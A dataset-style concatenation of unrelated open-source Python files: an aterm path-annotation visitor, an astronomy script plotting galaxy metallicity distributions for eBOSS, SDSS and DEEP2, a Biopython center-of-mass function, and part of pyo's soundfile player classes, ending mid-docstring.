		return '/' + ''.join([str(elm) + '/' for elm in self.indices])

	__str__ = toStr
class _Annotator(visitor.Visitor):
	'''Visitor that annotates application subterms with their path.

	func, when given, is a predicate deciding which applications receive
	a 'Path' annotation; by default every application is annotated.
	'''

	def __init__(self, func = None):
		visitor.Visitor.__init__(self)
		if func is None:
			# annotate every application by default
			self.func = lambda term: True
		else:
			self.func = func

	def visitTerm(self, term, path):
		# leaves carry no path annotation
		return term

	def visitCons(self, term, path):
		# enumerate() replaces itertools.izip(itertools.count(), ...),
		# which exists only on Python 2, with identical behavior.
		return term.factory.makeList(
			[self.visit(elm, term.factory.makeCons(term.factory.makeInt(index), path))
			 for index, elm in enumerate(term)]
		)

	def visitAppl(self, term, path):
		# rebuild the application with each argument visited under its
		# extended (child-index prepended) path
		term = term.factory.makeAppl(
			term.name,
			[self.visit(arg, term.factory.makeCons(term.factory.makeInt(index), path))
			 for index, arg in enumerate(term.args)],
			term.annotations,
		)
		if self.func(term):
			return annotation.set(term, term.factory.makeAppl('Path', [path]))
		else:
			return term
def annotate(term, root = None, func = None):
	'''Recursively annotates the terms and all subterms with their
	path.'''
	# Default to the empty (nil) path when no root path is supplied.
	start = root if root is not None else term.factory.makeNil()
	return _Annotator(func).visit(term, start)
class _DeAnnotator(_Annotator):
	# Strips the 'Path' annotation from application terms.
	# NOTE(review): unlike _Annotator.visitAppl, this override does not
	# descend into term.args, so nested applications are handled only via
	# list traversal (visitCons) -- confirm whether that is intended.
	def visitAppl(self, term, path):
		return annotation.remove(term, 'Path')
def deannotate(term):
	'''Recursively removes all path annotations.'''
	# Start from the empty (nil) root path, mirroring annotate().
	return _DeAnnotator().visit(term, term.factory.makeNil())
|
mewbak/idc
|
aterm/path.py
|
Python
|
lgpl-2.1
| 5,156
|
[
"VisIt"
] |
fa11ac82113aebe50bd1ad7a3ef6080c9269ff23156394bcc347aded7d3be6aa
|
from lib_spm import *
#out_dir = os.path.join('/data42s/comparat/firefly/v1_1_0/figures', 'mass-redshift-presentation')
out_dir = os.path.join(os.environ['HOME'], 'wwwDir', 'firefly')
m_bins = n.arange(-3., 3., 0.01)
p.figure(2, (6.5, 3.5))
p.axes([0.12,0.18,0.8,0.73])
print('eboss')
for imf in imfs:
stellar_mass = imf+'stellar_mass'
age = imf+'metallicity_lightW'
redshift_reliable_boss = (boss['CLASS_NOQSO'] == "GALAXY") & ( boss['Z_ERR_NOQSO'] > 0.0) & (boss['ZWARNING_NOQSO'] == 0) & (boss['Z_NOQSO']>0.001) & (boss['Z_NOQSO'] > boss['Z_ERR_NOQSO'] ) # (boss['SN_MEDIAN_ALL'] > 0.1 ) &
error_reliable_boss = (boss[stellar_mass+'_up_1sig'] > boss[stellar_mass+'_low_1sig'] ) & (boss[stellar_mass+'_up_1sig'] > 0. ) & ( boss[stellar_mass+'_low_1sig'] > 0. ) & (boss[stellar_mass+'_up_1sig'] < 1e14 ) & ( boss[stellar_mass+'_low_1sig'] < 1e14 )
mass_reliable_boss_02 = (boss[stellar_mass] > 1e6 ) & ( boss[stellar_mass] < 1e14 ) & ((n.log10(boss[stellar_mass+'_up_1sig']) - n.log10(boss[stellar_mass+'_low_1sig']))/2. < 0.2 )
mass_reliable_boss_04 = (boss[stellar_mass] > 1e6 ) & ( boss[stellar_mass] < 1e14 ) & ((n.log10(boss[stellar_mass+'_up_1sig']) - n.log10(boss[stellar_mass+'_low_1sig']))/2. < 0.4)
ok_boss_02 = (error_reliable_boss) & (mass_reliable_boss_02) & (redshift_reliable_boss)
ok_boss_04 = (error_reliable_boss) & (mass_reliable_boss_04) & (redshift_reliable_boss)
#Ms_02_boss = n.log10(boss[stellar_mass][ok_boss_02])
Ms_04_boss = n.log10(boss[age][ok_boss_04])
p.hist(Ms_04_boss, bins = m_bins, histtype='step', label=imf[:-1], cumulative=True, normed=True )
p.ylabel(r"N(dlogZ=0.02)")
p.xlabel(r'$\log_{10}(Z/Z_\odot)$')
#p.yscale('log')
p.title('eBOSS')
p.legend(loc=2, frameon = False, fontsize=11)
p.xlim((-2.5,0.5))
p.grid()
p.savefig(os.path.join(out_dir, "metallicity_lightW_distribution_eboss.png" ))
p.clf()
print('sdss')
p.figure(2, (6.5, 3.5))
p.axes([0.12,0.18,0.8,0.73])
for imf in imfs:
stellar_mass = imf+'stellar_mass'
age = imf+'metallicity_lightW'
redshift_reliable_sdss = (sdss['CLASS'] == "GALAXY") & ( sdss['Z_ERR'] > 0.0) & (sdss['ZWARNING'] == 0) & (sdss['Z'] > 0.001) & (sdss['Z'] > sdss['Z_ERR'] ) # (sdss['SN_MEDIAN_ALL'] > 0.1 ) &
error_reliable_sdss = (sdss[stellar_mass+'_up_1sig'] > sdss[stellar_mass+'_low_1sig'] ) & (sdss[stellar_mass+'_up_1sig'] > 0. ) & ( sdss[stellar_mass+'_low_1sig'] > 0. ) & (sdss[stellar_mass+'_up_1sig'] < 1e14 ) & ( sdss[stellar_mass+'_low_1sig'] < 1e14 )
mass_reliable_sdss_02 = (sdss[stellar_mass] > 1e6 ) & ( sdss[stellar_mass] < 1e14 ) & ((n.log10(sdss[stellar_mass+'_up_1sig']) - n.log10(sdss[stellar_mass+'_low_1sig']))/2. < 0.2 )
mass_reliable_sdss_04 = (sdss[stellar_mass] > 1e6 ) & ( sdss[stellar_mass] < 1e14 ) & ((n.log10(sdss[stellar_mass+'_up_1sig']) - n.log10(sdss[stellar_mass+'_low_1sig']))/2. < 0.4 )
ok_sdss_02 = (error_reliable_sdss) & (mass_reliable_sdss_02) & (redshift_reliable_sdss)
ok_sdss_04 = (error_reliable_sdss) & (mass_reliable_sdss_04) & (redshift_reliable_sdss)
#Ms_02_sdss = n.log10(sdss[stellar_mass][ok_sdss_02])
Ms_04_sdss = n.log10(sdss[age][ok_sdss_04])
p.hist(Ms_04_sdss, bins = m_bins, histtype='step', label=imf[:-1] , cumulative=True, normed=True )
p.ylabel(r"N(dlogZ=0.02)")
p.xlabel(r'$\log_{10}(Z/Z_\odot)$')
#p.yscale('log')
p.title('SDSS')
p.legend(loc=2, frameon = False, fontsize=11)
p.xlim((-2.5,0.5))
p.grid()
p.savefig(os.path.join(out_dir, "metallicity_lightW_distribution_sdss.png" ))
p.clf()
print('deep2')
p.figure(2, (6.5, 3.5))
p.axes([0.12,0.18,0.8,0.73])
for imf in imfs:
stellar_mass = imf+'stellar_mass'
age = imf+'metallicity_lightW'
z_flg = 'ZQUALITY'
z_name = 'ZBEST'
deep2_zOk = (deep2[z_name] > 0.001) & (deep2[z_flg]>=2.) & (deep2[z_name] < 1.7) & (deep2['SSR']>0) & (deep2['TSR']>0) & (deep2['SSR']<=1.0001) & (deep2['TSR']<=1.0001)
deep2_sel_02 = (deep2_zOk) & (deep2[stellar_mass] < 10**14. ) & (deep2[stellar_mass] > 0. ) & (deep2[stellar_mass] >= deep2[stellar_mass+'_low_1sig'] ) & (deep2[stellar_mass] <= deep2[stellar_mass+'_up_1sig'] ) & ( - n.log10(deep2[stellar_mass+'_low_1sig']) + n.log10(deep2[stellar_mass+'_up_1sig']) < 0.4 )
deep2_sel_04 = (deep2_zOk) & (deep2[stellar_mass] < 10**14. ) & (deep2[stellar_mass] > 0. ) & (deep2[stellar_mass] >= deep2[stellar_mass+'_low_1sig'] ) & (deep2[stellar_mass] <= deep2[stellar_mass+'_up_1sig'] ) & ( - n.log10(deep2[stellar_mass+'_low_1sig']) + n.log10(deep2[stellar_mass+'_up_1sig']) < 0.8 )
Ms_02_d2 = n.log10(deep2[age][deep2_sel_02])
Ms_04_d2 = n.log10(deep2[age][deep2_sel_04])
w_deep2 = 1. / (deep2['TSR'] * deep2['SSR'])
p.hist(Ms_04_d2, bins = m_bins, histtype='step', label=imf[:-1] , cumulative=True, normed=True )
p.ylabel('normed cumulative distribution')
p.xlabel(r'$\log_{10}(Z/Z_\odot)$')
#p.yscale('log')
p.title('DEEP2')
p.legend(loc=2, frameon = False, fontsize=11)
p.xlim((-2.5,0.5))
p.grid()
p.savefig(os.path.join(out_dir, "metallicity_lightW_distribution_deep2.png" ))
p.clf()
###############################################################
###############################################################
###############################################################
###############################################################
###############################################################
###############################################################
p.figure(2, (6.5, 3.5))
p.axes([0.12,0.18,0.8,0.73])
print('eboss')
for imf in imfs:
stellar_mass = imf+'stellar_mass'
age = imf+'metallicity_massW'
redshift_reliable_boss = (boss['CLASS_NOQSO'] == "GALAXY") & ( boss['Z_ERR_NOQSO'] > 0.0) & (boss['ZWARNING_NOQSO'] == 0) & (boss['Z_NOQSO']>0.001) & (boss['Z_NOQSO'] > boss['Z_ERR_NOQSO'] ) # (boss['SN_MEDIAN_ALL'] > 0.1 ) &
error_reliable_boss = (boss[stellar_mass+'_up_1sig'] > boss[stellar_mass+'_low_1sig'] ) & (boss[stellar_mass+'_up_1sig'] > 0. ) & ( boss[stellar_mass+'_low_1sig'] > 0. ) & (boss[stellar_mass+'_up_1sig'] < 1e14 ) & ( boss[stellar_mass+'_low_1sig'] < 1e14 )
mass_reliable_boss_02 = (boss[stellar_mass] > 1e6 ) & ( boss[stellar_mass] < 1e14 ) & ((n.log10(boss[stellar_mass+'_up_1sig']) - n.log10(boss[stellar_mass+'_low_1sig']))/2. < 0.2 )
mass_reliable_boss_04 = (boss[stellar_mass] > 1e6 ) & ( boss[stellar_mass] < 1e14 ) & ((n.log10(boss[stellar_mass+'_up_1sig']) - n.log10(boss[stellar_mass+'_low_1sig']))/2. < 0.4)
ok_boss_02 = (error_reliable_boss) & (mass_reliable_boss_02) & (redshift_reliable_boss)
ok_boss_04 = (error_reliable_boss) & (mass_reliable_boss_04) & (redshift_reliable_boss)
#Ms_02_boss = n.log10(boss[stellar_mass][ok_boss_02])
Ms_04_boss = n.log10(boss[age][ok_boss_04])
p.hist(Ms_04_boss, bins = m_bins, histtype='step', label=imf[:-1], cumulative=True, normed=True )
p.ylabel('normed cumulative distribution')
p.xlabel(r'$\log_{10}(Z/Z_\odot)$')
#p.yscale('log')
p.title('eBOSS')
p.legend(loc=2, frameon = False, fontsize=11)
p.xlim((-2.5,0.5))
p.grid()
p.savefig(os.path.join(out_dir, "metallicity_massW_distribution_eboss.png" ))
p.clf()
print('sdss')
p.figure(2, (6.5, 3.5))
p.axes([0.12, 0.18, 0.8, 0.73])
for imf in imfs:
    # Catalog column names for this IMF prefix.
    stellar_mass = imf + 'stellar_mass'
    age = imf + 'metallicity_massW'
    # Reliable redshift: confident galaxy classification with a positive,
    # well-measured redshift.
    redshift_reliable_sdss = (sdss['CLASS'] == "GALAXY") & (sdss['Z_ERR'] > 0.0) & (sdss['ZWARNING'] == 0) & (sdss['Z'] > 0.001) & (sdss['Z'] > sdss['Z_ERR'])  # (sdss['SN_MEDIAN_ALL'] > 0.1) &
    # Sane 1-sigma bounds on the stellar-mass estimate.
    error_reliable_sdss = (sdss[stellar_mass + '_up_1sig'] > sdss[stellar_mass + '_low_1sig']) & (sdss[stellar_mass + '_up_1sig'] > 0.) & (sdss[stellar_mass + '_low_1sig'] > 0.) & (sdss[stellar_mass + '_up_1sig'] < 1e14) & (sdss[stellar_mass + '_low_1sig'] < 1e14)
    # Mass in a physical range with uncertainty below 0.2 / 0.4 dex.
    mass_reliable_sdss_02 = (sdss[stellar_mass] > 1e6) & (sdss[stellar_mass] < 1e14) & ((n.log10(sdss[stellar_mass + '_up_1sig']) - n.log10(sdss[stellar_mass + '_low_1sig'])) / 2. < 0.2)
    mass_reliable_sdss_04 = (sdss[stellar_mass] > 1e6) & (sdss[stellar_mass] < 1e14) & ((n.log10(sdss[stellar_mass + '_up_1sig']) - n.log10(sdss[stellar_mass + '_low_1sig'])) / 2. < 0.4)
    ok_sdss_02 = (error_reliable_sdss) & (mass_reliable_sdss_02) & (redshift_reliable_sdss)
    ok_sdss_04 = (error_reliable_sdss) & (mass_reliable_sdss_04) & (redshift_reliable_sdss)
    # Ms_02_sdss = n.log10(sdss[stellar_mass][ok_sdss_02])
    Ms_04_sdss = n.log10(sdss[age][ok_sdss_04])
    # `normed` was deprecated in matplotlib 2.1 and removed in 3.1;
    # `density=True` is the supported equivalent.
    p.hist(Ms_04_sdss, bins=m_bins, histtype='step', label=imf[:-1], cumulative=True, density=True)
p.ylabel('normed cumulative distribution')
p.xlabel(r'$\log_{10}(Z/Z_\odot)$')
# p.yscale('log')
p.title('SDSS')
p.legend(loc=2, frameon=False, fontsize=11)
p.xlim((-2.5, 0.5))
p.grid()
p.savefig(os.path.join(out_dir, "metallicity_massW_distribution_sdss.png"))
p.clf()
print('deep2')
p.figure(2, (6.5, 3.5))
p.axes([0.12, 0.18, 0.8, 0.73])
for imf in imfs:
    # Catalog column names for this IMF prefix.
    stellar_mass = imf + 'stellar_mass'
    age = imf + 'metallicity_massW'
    z_flg = 'ZQUALITY'
    z_name = 'ZBEST'
    # Good DEEP2 redshift: quality flag >= 2, 0.001 < z < 1.7, and valid
    # targeting / spectroscopic success rates.
    deep2_zOk = (deep2[z_name] > 0.001) & (deep2[z_flg] >= 2.) & (deep2[z_name] < 1.7) & (deep2['SSR'] > 0) & (deep2['TSR'] > 0) & (deep2['SSR'] <= 1.0001) & (deep2['TSR'] <= 1.0001)
    # Mass inside its 1-sigma interval with total width below 0.4 / 0.8 dex.
    deep2_sel_02 = (deep2_zOk) & (deep2[stellar_mass] < 10**14.) & (deep2[stellar_mass] > 0.) & (deep2[stellar_mass] >= deep2[stellar_mass + '_low_1sig']) & (deep2[stellar_mass] <= deep2[stellar_mass + '_up_1sig']) & (- n.log10(deep2[stellar_mass + '_low_1sig']) + n.log10(deep2[stellar_mass + '_up_1sig']) < 0.4)
    deep2_sel_04 = (deep2_zOk) & (deep2[stellar_mass] < 10**14.) & (deep2[stellar_mass] > 0.) & (deep2[stellar_mass] >= deep2[stellar_mass + '_low_1sig']) & (deep2[stellar_mass] <= deep2[stellar_mass + '_up_1sig']) & (- n.log10(deep2[stellar_mass + '_low_1sig']) + n.log10(deep2[stellar_mass + '_up_1sig']) < 0.8)
    # Removed unused locals from the original:
    # Ms_02_d2 = n.log10(deep2[age][deep2_sel_02])
    # w_deep2 = 1. / (deep2['TSR'] * deep2['SSR'])   # selection weights, not used by this histogram
    Ms_04_d2 = n.log10(deep2[age][deep2_sel_04])
    # `normed` was deprecated in matplotlib 2.1 and removed in 3.1;
    # `density=True` is the supported equivalent.
    p.hist(Ms_04_d2, bins=m_bins, histtype='step', label=imf[:-1], cumulative=True, density=True)
p.ylabel('normed cumulative distribution')
p.xlabel(r'$\log_{10}(Z/Z_\odot)$')
# p.yscale('log')
p.title('DEEP2')
p.legend(loc=2, frameon=False, fontsize=11)
p.xlim((-2.5, 0.5))
p.grid()
p.savefig(os.path.join(out_dir, "metallicity_massW_distribution_deep2.png"))
p.clf()
|
JohanComparat/pySU
|
spm/bin_SMF/plot_distribution_metals.py
|
Python
|
cc0-1.0
| 10,258
|
[
"Firefly",
"Galaxy"
] |
fee2da742f36c00f95dbadea0f38b19e4c14e1237cae8478b2b9460bfa3dbea5
|
# Copyright (C) 2010, Joao Rodrigues (anaryin@gmail.com)
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""
Module with assorted geometrical functions on
macromolecules.
"""
from Bio.PDB import Entity
import numpy as np
def center_of_mass(entity, geometric=False):
    """
    Return the gravitic [default] or geometric center of mass of an Entity.

    With geometric=True every atom is weighted equally, giving the
    geometric center instead of the mass-weighted one.
    """
    # Resolve the input into a flat sequence of atoms.
    if isinstance(entity, Entity.Entity):
        # Structure, Model, Chain or Residue
        atom_list = entity.get_atoms()
    elif hasattr(entity, '__iter__') and [x for x in entity if x.level == 'R']:
        # An iterable of Residues
        atom_list = []
        for residue in entity:
            atom_list.extend(list(residue.get_atoms()))
    elif hasattr(entity, '__iter__') and [x for x in entity if x.level == 'A']:
        # An iterable of Atoms
        atom_list = entity
    else:  # Some other weirdo object
        raise ValueError("Center of Mass can only be calculated from the following objects:\n"
                         "Structure, Model, Chain, Residue, list of Atoms.")
    # Collect masses and per-axis coordinate lists: [[X...], [Y...], [Z...]].
    masses = []
    positions = [[], [], []]
    for atom in atom_list:
        masses.append(atom.mass)
        for axis, value in enumerate(np.array(atom.coord).tolist()):
            positions[axis].append(value)
    # A single atom with an undefined mass invalidates the gravitic center.
    if 'ukn' in set(masses) and not geometric:
        raise ValueError("Some Atoms don't have an element assigned.\n"
                         "Try adding them manually or calculate the geometrical center of mass instead.")
    if geometric:
        return [sum(axis_values) / len(masses) for axis_values in positions]
    # Mass-weighted average of each coordinate axis.
    weighted = [[], [], []]
    for idx, mass in enumerate(masses):
        weighted[0].append(positions[0][idx] * mass)
        weighted[1].append(positions[1][idx] * mass)
        weighted[2].append(positions[2][idx] * mass)
    return [sum(axis_values) / sum(masses) for axis_values in weighted]
|
SBRG/ssbio
|
ssbio/biopython/Bio/Struct/Geometry.py
|
Python
|
mit
| 2,274
|
[
"Biopython"
] |
6ed0786b6de3a60a208701d3e555475c1989808bfa98a21851d6dca19467f14b
|
"""
Play soundfiles from the disk.
SfMarkerXXX objects use markers features (store in the header) from
an AIFF file to create more specific reading patterns.
"""
"""
Copyright 2009-2015 Olivier Belanger
This file is part of pyo, a python module to help digital signal
processing script creation.
pyo is free software: you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as
published by the Free Software Foundation, either version 3 of the
License, or (at your option) any later version.
pyo is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with pyo. If not, see <http://www.gnu.org/licenses/>.
"""
from ._core import *
from ._maps import *
import aifc
class SfPlayer(PyoObject):
    """
    Soundfile player.

    Reads audio data from a file using one of several available interpolation
    types. User can alter its pitch with the `speed` attribute. The object
    takes care of sampling rate conversion to match the Server sampling
    rate setting.

    :Parent: :py:class:`PyoObject`

    :Args:

        path: string
            Full path name of the sound to read.
        speed: float or PyoObject, optional
            Transpose the pitch of input sound by this factor.
            Defaults to 1.

            1 is the original pitch, lower values play sound slower, and higher
            values play sound faster.

            Negative values results in playing sound backward.

            Although the `speed` attribute accepts audio
            rate signal, its value is updated only once per buffer size.
        loop: bool, optional
            If set to True, sound will play in loop. Defaults to False.
        offset: float, optional
            Time in seconds of input sound to be skipped, assuming speed = 1.

            If the object is already playing (and play() is implicitly called at
            the object creation), this value will be effective only on the next
            loop point. Defaults to 0.
        interp: int, optional
            Interpolation type. Defaults to 2.
                1. no interpolation
                2. linear
                3. cosinus
                4. cubic

    .. note::

        SfPlayer will send a trigger signal at the end of the playback if
        loop is off or any time it wraps around if loop is on. User can
        retrieve the trigger streams by calling obj['trig']:

        >>> sf = SfPlayer(SNDS_PATH + "/transparent.aif").out()
        >>> trig = TrigRand(sf['trig'])

        Note that the object will send as many trigs as there is channels
        in the sound file. If you want to retrieve only one trig, only give
        the first stream to the next object:

        >>> def printing():
        ...     print("one trig!")
        >>> sf = SfPlayer("/stereo/sound/file.aif").out()
        >>> trig = TrigFunc(sf['trig'][0], printing)

    >>> s = Server().boot()
    >>> s.start()
    >>> snd = SNDS_PATH + "/transparent.aif"
    >>> sf = SfPlayer(snd, speed=[.75,.8], loop=True, mul=.3).out()

    """

    def __init__(self, path, speed=1, loop=False, offset=0, interp=2, mul=1, add=0):
        pyoArgsAssert(self, "sObniOO", path, speed, loop, offset, interp, mul, add)
        PyoObject.__init__(self, mul, add)
        self._path = path
        self._speed = speed
        self._loop = loop
        self._offset = offset
        self._interp = interp
        path, speed, loop, offset, interp, mul, add, lmax = convertArgsToLists(
            path, speed, loop, offset, interp, mul, add
        )
        self._base_players = []
        self._base_objs = []
        _trig_objs_tmp = []
        for i in range(lmax):
            # NOTE(review): channel count is read from path[0] for every
            # player, not wrap(path, i) — assumes all paths share the same
            # channel count (consistent with setPath's restriction).
            _snd_size, _dur, _snd_sr, _snd_chnls, _format, _type = sndinfo(path[0])
            self._base_players.append(
                SfPlayer_base(
                    stringencode(wrap(path, i)), wrap(speed, i), wrap(loop, i), wrap(offset, i), wrap(interp, i)
                )
            )
            # One audio stream per channel of the sound file.
            for j in range(_snd_chnls):
                self._base_objs.append(SfPlay_base(self._base_players[-1], j, wrap(mul, i), wrap(add, i)))
            _trig_objs_tmp.append(TriggerDummy_base(self._base_players[-1]))
        self._trig_objs = Dummy(_trig_objs_tmp)
        self._init_play()

    def setPath(self, path):
        """
        Sets a new sound to read.

        The number of channels of the new sound must match those
        of the sound loaded at initialization time.

        :Args:

            path: string
                Full path of the new sound.

        """
        pyoArgsAssert(self, "s", path)
        if type(self._path) == list:
            curNchnls = sndinfo(self._path[0])[3]
        else:
            curNchnls = sndinfo(self._path)[3]
        if type(path) == list:
            p = path[0]
        else:
            p = path
        try:
            _snd_size, _dur, _snd_sr, _snd_chnls, _format, _type = sndinfo(p)
        except Exception:
            # Unreadable file: keep the current sound (best-effort, as before).
            return
        if _snd_chnls != curNchnls:
            # Fixed grammar of the user-facing message ("must contains").
            print("Soundfile must contain exactly %d channels." % curNchnls)
            return
        self._path = path
        path, lmax = convertArgsToLists(path)
        [obj.setSound(stringencode(wrap(path, i))) for i, obj in enumerate(self._base_players)]

    def setSound(self, path):
        """
        Sets a new sound to read.

        The number of channels of the new sound must match those
        of the sound loaded at initialization time.

        :Args:

            path: string
                Full path of the new sound.

        """
        self.setPath(path)

    def setSpeed(self, x):
        """
        Replace the `speed` attribute.

        :Args:

            x: float or PyoObject
                new `speed` attribute.

        """
        pyoArgsAssert(self, "O", x)
        self._speed = x
        x, lmax = convertArgsToLists(x)
        [obj.setSpeed(wrap(x, i)) for i, obj in enumerate(self._base_players)]

    def setLoop(self, x):
        """
        Replace the `loop` attribute.

        :Args:

            x: bool {True, False}
                new `loop` attribute.

        """
        pyoArgsAssert(self, "b", x)
        self._loop = x
        x, lmax = convertArgsToLists(x)
        for i, obj in enumerate(self._base_players):
            if wrap(x, i):
                obj.setLoop(1)
            else:
                obj.setLoop(0)

    def setOffset(self, x):
        """
        Replace the `offset` attribute.

        :Args:

            x: float
                new `offset` attribute.

        """
        pyoArgsAssert(self, "n", x)
        self._offset = x
        x, lmax = convertArgsToLists(x)
        [obj.setOffset(wrap(x, i)) for i, obj in enumerate(self._base_players)]

    def setInterp(self, x):
        """
        Replace the `interp` attribute.

        :Args:

            x: int {1, 2, 3, 4}
                new `interp` attribute.

        """
        pyoArgsAssert(self, "i", x)
        self._interp = x
        x, lmax = convertArgsToLists(x)
        [obj.setInterp(wrap(x, i)) for i, obj in enumerate(self._base_players)]

    def ctrl(self, map_list=None, title=None, wxnoserver=False):
        self._map_list = [
            SLMap(-2.0, 2.0, "lin", "speed", self._speed),
            SLMap(1, 4, "lin", "interp", self._interp, res="int", dataOnly=True),
            SLMapMul(self._mul),
        ]
        PyoObject.ctrl(self, map_list, title, wxnoserver)

    @property
    def path(self):
        """string. Full path of the sound."""
        return self._path

    @path.setter
    def path(self, x):
        self.setPath(x)

    @property
    def sound(self):
        """string. Alias to the `path` attribute."""
        return self._path

    @sound.setter
    def sound(self, x):
        self.setPath(x)

    @property
    def speed(self):
        """float or PyoObject. Transposition factor."""
        return self._speed

    @speed.setter
    def speed(self, x):
        self.setSpeed(x)

    @property
    def loop(self):
        """bool. Looping mode."""
        return self._loop

    @loop.setter
    def loop(self, x):
        self.setLoop(x)

    @property
    def offset(self):
        """float. Time, in seconds, of the first sample to read."""
        return self._offset

    @offset.setter
    def offset(self, x):
        self.setOffset(x)

    @property
    def interp(self):
        """int {1, 2, 3, 4}. Interpolation method."""
        return self._interp

    @interp.setter
    def interp(self, x):
        self.setInterp(x)
class SfMarkerShuffler(PyoObject):
    """
    AIFF with markers soundfile shuffler.

    Reads audio data from a AIFF file using one of several available
    interpolation types. User can alter its pitch with the `speed`
    attribute. The object takes care of sampling rate conversion to
    match the Server sampling rate setting.

    The reading pointer randomly choose a marker (from the MARK chunk
    in the header of the AIFF file) as its starting point and reads
    the samples until it reaches the following marker. Then, it choose
    another marker and reads from the new position and so on...

    :Parent: :py:class:`PyoObject`

    :Args:

        path: string
            Full path name of the sound to read. Can't e changed after
            initialization.
        speed: float or PyoObject, optional
            Transpose the pitch of input sound by this factor.
            Defaults to 1.

            1 is the original pitch, lower values play sound slower, and higher
            values play sound faster.

            Negative values results in playing sound backward.

            Although the `speed` attribute accepts audio
            rate signal, its value is updated only once per buffer size.
        interp: int, optional
            Choice of the interpolation method. Defaults to 2.
                1. no interpolation
                2. linear
                3. cosinus
                4. cubic

    >>> s = Server().boot()
    >>> s.start()
    >>> sound = SNDS_PATH + "/transparent.aif"
    >>> sf = SfMarkerShuffler(sound, speed=[1,1], mul=.3).out()
    >>> sf.setRandomType("expon_min", 0.6)

    """

    def __init__(self, path, speed=1, interp=2, mul=1, add=0):
        pyoArgsAssert(self, "sOiOO", path, speed, interp, mul, add)
        PyoObject.__init__(self, mul, add)
        self._speed = speed
        self._interp = interp
        path, speed, interp, mul, add, lmax = convertArgsToLists(path, speed, interp, mul, add)
        self._base_players = []
        self._base_objs = []
        self._snd_size, self._dur, self._snd_sr, self._snd_chnls, _format, _type = sndinfo(path[0])
        for i in range(lmax):
            # Read the MARK chunk from the AIFF header; a file without
            # readable markers yields an empty marker list.
            # NOTE(review): self._markers is overwritten on each iteration,
            # so getMarkers() reports the markers of the last path only.
            try:
                sf = aifc.open(wrap(path, i))  # Do we need stringencode() here?
                markerstmp = sf.getmarkers()
                sf.close()
                self._markers = [m[1] for m in markerstmp]
            except Exception:
                self._markers = []
            self._base_players.append(
                SfMarkerShuffler_base(stringencode(wrap(path, i)), self._markers, wrap(speed, i), wrap(interp, i))
            )
        # One audio stream per channel of each player.
        for i in range(lmax * self._snd_chnls):
            j = i // self._snd_chnls
            self._base_objs.append(
                SfMarkerShuffle_base(wrap(self._base_players, j), i % self._snd_chnls, wrap(mul, j), wrap(add, j))
            )
        self._init_play()

    def setSpeed(self, x):
        """
        Replace the `speed` attribute.

        :Args:

            x: float or PyoObject
                new `speed` attribute.

        """
        pyoArgsAssert(self, "O", x)
        self._speed = x
        x, lmax = convertArgsToLists(x)
        [obj.setSpeed(wrap(x, i)) for i, obj in enumerate(self._base_players)]

    def setInterp(self, x):
        """
        Replace the `interp` attribute.

        :Args:

            x: int {1, 2, 3, 4}
                new `interp` attribute.

        """
        pyoArgsAssert(self, "i", x)
        self._interp = x
        x, lmax = convertArgsToLists(x)
        [obj.setInterp(wrap(x, i)) for i, obj in enumerate(self._base_players)]

    def setRandomType(self, dist=0, x=0.5):
        """
        Set the random distribution type used to choose the markers.

        :Args:

            dist: int or string
                The distribution type. Available distributions are:
                    0. uniform (default)
                    1. linear minimum
                    2. linear maximum
                    3. triangular
                    4. exponential minimum
                    5. exponential maximum
                    6. double (bi)exponential
                    7. cauchy
                    8. weibull
                    9. gaussian
            x: float
                Distribution specific parameter, if applicable, as a float
                between 0 and 1. Defaults to 0.5.

        .. note::

            Depending on the distribution type, `x` parameter is applied as
            follow (names as string, or associated number can be used as `dist`
            parameter):

            0. uniform
                - x: not used
            1. linear_min
                - x: not used
            2. linear_max
                - x: not used
            3. triangle
                - x: not used
            4. expon_min
                - x: slope {0 = no slope -> 1 = sharp slope}
            5. expon_max
                - x: slope {0 = no slope -> 1 = sharp slope}
            6. biexpon
                - x: bandwidth {0 = huge bandwidth -> 1 = narrow bandwidth}
            7. cauchy
                - x: bandwidth {0 = huge bandwidth -> 1 = narroe bandwidth}
            8. weibull
                - x: shape {0 = expon min => linear min => 1 = gaussian}
            9. gaussian
                - x: bandwidth {0 = huge bandwidth -> 1 = narrow bandwidth}

        """
        dist, x, lmax = convertArgsToLists(dist, x)
        # Accept distribution names as strings; unknown names fall back to 0.
        for i, t in enumerate(dist):
            if type(t) in [bytes, str]:
                dist[i] = XNOISE_DICT.get(t, 0)
        [obj.setRandomType(wrap(dist, i), wrap(x, i)) for i, obj in enumerate(self._base_players)]

    def getMarkers(self):
        """
        Returns a list of marker time values in samples.
        """
        return self._markers

    def ctrl(self, map_list=None, title=None, wxnoserver=False):
        self._map_list = [
            SLMap(0.01, 2.0, "lin", "speed", self._speed),
            SLMap(1, 4, "lin", "interp", self._interp, res="int", dataOnly=True),
            SLMapMul(self._mul),
        ]
        PyoObject.ctrl(self, map_list, title, wxnoserver)

    @property
    def speed(self):
        """float or PyoObject. Transposition factor."""
        return self._speed

    @speed.setter
    def speed(self, x):
        self.setSpeed(x)

    @property
    def interp(self):
        """int {1, 2, 3, 4}. Interpolation method."""
        return self._interp

    @interp.setter
    def interp(self, x):
        self.setInterp(x)
class SfMarkerLooper(PyoObject):
    """
    AIFF with markers soundfile looper.

    Reads audio data from a AIFF file using one of several available
    interpolation types. User can alter its pitch with the `speed`
    attribute. The object takes care of sampling rate conversion to
    match the Server sampling rate setting.

    The reading pointer loops a specific marker (from the MARK chunk
    in the header of the AIFF file) until it received a new integer
    in the `mark` attribute.

    :Parent: :py:class:`PyoObject`

    :Args:

        path: string
            Full path name of the sound to read.
        speed: float or PyoObject, optional
            Transpose the pitch of input sound by this factor.
            Defaults to 1.

            1 is the original pitch, lower values play sound slower, and higher
            values play sound faster.

            Negative values results in playing sound backward.

            Although the `speed` attribute accepts audio
            rate signal, its value is updated only once per buffer size.
        mark: float or PyoObject, optional
            Integer denoting the marker to loop, in the range
            0 -> len(getMarkers()). Defaults to 0.
        interp: int, optional
            Choice of the interpolation method. Defaults to 2.
                1. no interpolation
                2. linear
                3. cosinus
                4. cubic

    >>> s = Server().boot()
    >>> s.start()
    >>> a = SfMarkerLooper(SNDS_PATH + '/transparent.aif', speed=[.999,1], mul=.3).out()
